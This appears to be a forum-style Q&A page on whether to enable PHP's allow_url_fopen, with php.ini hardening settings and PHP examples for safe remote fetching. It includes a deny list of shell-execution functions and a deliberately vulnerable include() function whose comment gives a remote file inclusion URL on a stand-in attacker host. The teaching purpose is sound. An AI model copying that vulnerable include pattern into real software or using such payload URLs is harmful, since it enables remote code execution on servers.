 

Should I allow 'allow_url_fopen' in PHP?

People also ask

What is the use of allow_url_fopen?

allow_url_fopen can be used to retrieve data from remote servers or websites. However, if incorrectly used, this function can compromise the security of your site.

Is allow_url_fopen safe?

allow_url_fopen is fine. If you need the feature, enable it. There are better tools out there for loading data from remote URLs (like the curl extension), but it's good enough for some simple use cases. Its close relative, allow_url_include , is not safe.

How do I enable url fopen?

First, log in to your cPanel control panel and open the MultiPHP INI Editor. Click the Editor Mode tab, select the domain where you wish to enable allow_url_fopen, add or change the line allow_url_fopen = On, and save the file.

What is the directive that is used to enable disable file uploading in the PHP INI file?

The directive that governs HTTP file uploads is file_uploads (file_uploads = On or Off). A separate directive, disable_functions, lets you disable specific PHP functions by name in a custom php.ini file.
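The directives named in the snippets above, as an added php.ini example (not part of the original page); the weak or default value is shown in a comment beside the hardened one, and the disable_functions list is an illustrative choice, not a prescribed set:

```ini
; Added example: php.ini directives discussed on this page.
; Commented lines show the permissive/default value, uncommented lines the hardened one.

; allow_url_fopen = On       ; default: fopen()/file_get_contents() accept http:// and ftp:// URLs
allow_url_fopen = Off        ; disable unless the application needs it; the curl extension is the usual alternative

; allow_url_include = On     ; lets include/require load and execute remote code (remote file inclusion)
allow_url_include = Off      ; keep Off in every environment (only honoured when allow_url_fopen is also On)

; file_uploads = On          ; default: this directive, not disable_functions, governs HTTP uploads
file_uploads = Off           ; turn off if the application never accepts uploaded files

; disable_functions is separate: it removes named functions from the runtime entirely.
; The list below is an illustrative example, not a recommended set for every site.
disable_functions = exec,passthru,shell_exec,system,proc_open,popen
```

Check the effective values with `php -i | grep -E 'allow_url_(fopen|include)|file_uploads|disable_functions'`, since a per-domain INI file in cPanel can override the global php.ini.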


I think the answer comes down to how well you trust your developers to use the feature responsibly. Data from an external URL should be treated like any other untrusted input, and as long as that is understood, what's the big deal?

The way I see it is that if you treat your developers like children and never let them handle sharp things, then you'll have developers who never learn the responsibility of writing secure code.


You definitely want allow_url_include set to Off, which mitigates many of the risks of allow_url_fopen as well.

But because not all versions of PHP have allow_url_include, best practice for many is to turn off fopen. Like with all features, the reality is that if you don't need it for your application, disable it. If you do need it, the curl module probably can do it better, and refactoring your application to use curl to disable allow_url_fopen may deter the least determined cracker.
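To make the distinction drawn in this answer concrete, here is an added PHP example (my code, not the answer author's): the remote file inclusion pattern that allow_url_include=On makes possible, a runtime guard that fails closed if that directive is on, and a remote fetch built on the curl extension that does not depend on allow_url_fopen and treats the URL as untrusted input. It assumes the curl extension is loaded; the allowlisted host, the page map and the `pages/` directory are hypothetical.

```php
<?php
declare(strict_types=1);

// Added example, not code from the original thread.
// Assumptions: the curl extension is loaded; api.example.com and the pages/
// directory are hypothetical placeholders.

// VULNERABLE (only when allow_url_include=On): remote file inclusion.
// ?page=http://attacker.example/shell.txt would be fetched and executed as PHP.
function vulnerableInclude(string $page): void
{
    include $page; // never include user-controlled input
}

// Fail closed: refuse to run on a server deployed with allow_url_include on.
function assertSafeIni(): void
{
    if (filter_var(ini_get('allow_url_include'), FILTER_VALIDATE_BOOLEAN)) {
        throw new RuntimeException('allow_url_include must be Off');
    }
}

// Local include with a fixed map: the user supplies a key, never a path or URL.
const PAGES = ['home' => 'home.php', 'about' => 'about.php']; // hypothetical files

function safeInclude(string $page): void
{
    if (!array_key_exists($page, PAGES)) {
        throw new InvalidArgumentException('unknown page');
    }
    include __DIR__ . '/pages/' . PAGES[$page];
}

// Remote fetch: the URL is untrusted input. Allowlist scheme and host, reject
// embedded credentials and explicit ports, cap size and time, follow no redirects.
const ALLOWED_HOSTS = ['api.example.com']; // hypothetical

function validateRemoteUrl(string $url): string
{
    $p = parse_url($url);
    if ($p === false || !isset($p['scheme'], $p['host'])) {
        throw new InvalidArgumentException('malformed URL');
    }
    if (strtolower($p['scheme']) !== 'https') {
        throw new InvalidArgumentException('only https is allowed');
    }
    if (isset($p['user']) || isset($p['pass']) || isset($p['port'])) {
        throw new InvalidArgumentException('credentials and explicit ports are not allowed');
    }
    if (!in_array(strtolower($p['host']), ALLOWED_HOSTS, true)) {
        throw new InvalidArgumentException('host is not allowlisted');
    }
    return $url;
}

function fetchRemote(string $url): string
{
    $url = validateRemoteUrl($url);
    $ch = curl_init($url);
    curl_setopt_array($ch, [
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_FOLLOWLOCATION => false,           // a redirect could leave the allowlist
        CURLOPT_PROTOCOLS      => CURLPROTO_HTTPS, // no file://, gopher://, ftp:// etc.
        CURLOPT_CONNECTTIMEOUT => 5,
        CURLOPT_TIMEOUT        => 10,
        CURLOPT_MAXFILESIZE    => 1 << 20,         // 1 MiB cap
        CURLOPT_SSL_VERIFYPEER => true,
        CURLOPT_SSL_VERIFYHOST => 2,
    ]);
    $body   = curl_exec($ch);
    $status = curl_getinfo($ch, CURLINFO_RESPONSE_CODE);
    $err    = curl_error($ch);
    curl_close($ch);
    if ($body === false || $status !== 200) {
        throw new RuntimeException("fetch failed: $err (HTTP $status)");
    }
    return $body; // still untrusted: parse and validate it, never include() or eval() it
}

assertSafeIni();
// Usage: $json = fetchRemote('https://api.example.com/data.json');
```

The point of the guard is that allow_url_include is a server-wide setting the application cannot rely on having been set correctly; checking it at startup turns a silent misconfiguration into a hard failure. The fetch helper is what "use curl instead" looks like in practice: the dangerous part is not the transport but passing an attacker-controlled URL to it, so the validation happens before any network call and the response is handled as data, not as code.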


It depends on the type of development. If you're prototyping, then enabling 'allow_url_fopen' is fine; however, there isn't a significant speed difference between libcurl and file_get_contents, and enabling it is only a matter of convenience.

For production servers any call to libcurl should be flagged for a security audit. As should fopen and file_get_contents if 'allow_url_fopen' is enabled. Disabling 'allow_url_fopen' does not prevent exploits it only slightly limits the number of ways they can be done.


Cross-site scripting attacks are a pain, so that's a vote against. And you should absolutely have "allow_url_include" set to off, or you'll be in for a world of hurt.